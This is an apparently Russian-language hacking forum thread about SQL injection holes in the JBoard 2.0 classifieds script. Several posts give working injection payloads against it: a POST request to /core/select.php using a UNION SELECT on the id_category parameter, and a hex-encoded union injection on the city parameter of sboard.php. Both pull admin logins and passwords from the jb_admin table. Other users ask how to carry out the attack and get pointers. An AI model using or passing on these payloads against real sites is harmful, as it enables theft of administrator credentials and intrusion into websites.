JBoard Ver.2.0 Коммерческая версия

Discussion in 'Веб-уязвимости' started by BlackSun, 3 Feb 2009.

  1. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    del

    delete
     
    #1 BlackSun, 3 Feb 2009
    Last edited: 24 Aug 2010
    9 people like this.
  2. [х26]VОLАND

    [х26]VОLАND Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    513
    Likes Received:
    756
    Reputations:
    218
    Мда, и этот быдлокод ещё коммерческий... Кошмар.
     
    1 person likes this.
  3. demon201984

    demon201984 New Member

    Joined:
    24 Apr 2009
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    SQL-INJ
    POST запрос к /core/select.php
    aaaaaaa' UNION SELECT 1,2,concat_ws(0x3,login,password),4,5,6 FROM jb_admin --
    Вывод будет в последнем элементе выпадающего списка
    Уязвимый кусок кода: целиком весь файл)[/QUOTE]

    Пробовал вводить в строке браузера этот запрос выводит лишь список категорий в последнем элементе выпадащего списка ничего нет.

    Запрос вводил в формате: http://www.sait.ru/core/select.php?aaaaaaa' UNION SELECT 1,2,concat_ws(0x3,login,password),4,5,6 FROM jb_admin --

    Я что-то неверно ввожу или автор этот баг уже исправил?
     
  4. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    Читать умеешь? POST запрос

    PS: переменная id_category
     
  5. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,027
    Likes Received:
    311
    Reputations:
    86
    Блин, ну вот как вы это нашли, я понять просто не в силах...
    Особенно вот это:
    sboard.php?city=a'+union+select+0x612720554e494f4e 2053454c45435420312c322c332c342c352c362c636f6e6361 745f7773283078332c6c6f67696e2c70617373776f7264292c 382c392c31302c31312c31322c31332c31342c31352c31362c 31372c31382c31392c32302c32312c32322c32332c32342c32 352c32362c32372c32382c32392c33302c33312c33322c3333 2c33342046524f4d206a625f61646d696e202d2d20%20--%20​
     
    _________________________
  6. bluesky

    bluesky New Member

    Joined:
    26 Sep 2009
    Messages:
    44
    Likes Received:
    3
    Reputations:
    0
    Читать умеешь? POST запрос
    PS: переменная id_category[/QUOTE]
    Так подскажите как и чем можно реализовать сори за тупость, просто надо :confused:
     
  7. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    https://forum.antichat.ru/thread43966.html